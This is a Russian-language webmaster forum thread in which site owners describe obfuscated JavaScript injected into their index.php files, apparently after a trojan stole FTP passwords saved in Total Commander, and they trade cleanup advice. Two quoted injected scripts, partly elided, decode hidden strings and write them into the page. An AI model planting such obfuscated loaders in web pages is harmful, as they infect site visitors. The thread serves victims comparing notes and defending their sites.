- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Кто-нибудь сталкивался с этим?
<!--<S>--><script>try {function yb(pa){return parseInt(pa)}var AF='66u6lu6qu6Fu6Zu6
.......................
(gf=0;gf<jP.length;gf+=2){Ha=jP.substr(gf,2);for(lD=0;lD<AF.length;lD++){if(AF[lD]==Ha)break;} EX+=String.fromCharCode(CQ[lD]^145);}document.write(EX);}
catch(e){}</script><!--</S>-->
Сталкивались с чем-то подобным. В срочном порядке поменяли все пароли. Зараза отстала. Видимо троян подхватили, который из Тотал Коммандера пароли и явки стягивал. Больше пассворды на ФТП и другое на компе не храним.
Долго боролся с пинчами, потом забил и поставил Мазилу
Вот как раз для того чтобы предотвратить дальнейшее появление и необходимо выяснить источник инфицирования
Я все таки грешу на тот сайт который в IE проверял, но там не такой скрипт вставлялся а что-то типа
<!-- ~ --><script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
.......................................
while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if
((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(
0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script><!-- ~ -->
Все мои файлы были инфицированы 20.04.07 с 1 до 7 утра, обратил внимание на дату последнего изменения index.*. Проверьте свои сайты, есть у кого-нибудь что похожее?
у меня похожий скрипт в конце index.php на одном из сайтов объявился примерно в 20 числах апреля
а етот вирус index.php тоже поражал ????
а етот вирус index.php тоже поражал ????
Собственно только в нем скрипт и оказался.
(читая топики - выписывал советы)
Как поймать троянских коней
нужен комплекс средств и вот более-менее надежный софт:
http://www.avast.com/index.html - AVAST PRO
http://www.pctools.com/spyware-doctor/ - Spyware Doctor™ 5.0 for Windows - New Version! 5.0.0.176 19,071 KB
http://www.adaware.ru/ - Ad-Aware® SE 1.06
Долго боролся с пинчами, потом забил и поставил Мазилу
Из мозилы пинч пароли легко забирает 😒
Плачевный опыт
sud falke, Подобная херня была у знакомого, код висел на всех php файлах... Когда заходишь на сайт, этот JS качает троянец.
Удаляли несколько раз... Потом решили поменять пароли от ftp — Зараза отстала.
Была такая фигня буквально неделю назад.
Пароли для fttp действительно были выцеплены трояном из Total Commander.
Во все индексные файлы вставлен дополнительный код, либо просто заменены на другие.
Так пострадало 5 сайтов.
Nod действительно молчит и ничего не находит..выход один менять все пароли на ftp и ставить фаервол+тот же Nod//
sud falke
Удаляли несколько раз... Потом решили поменять пароли от ftp — Зараза отстала.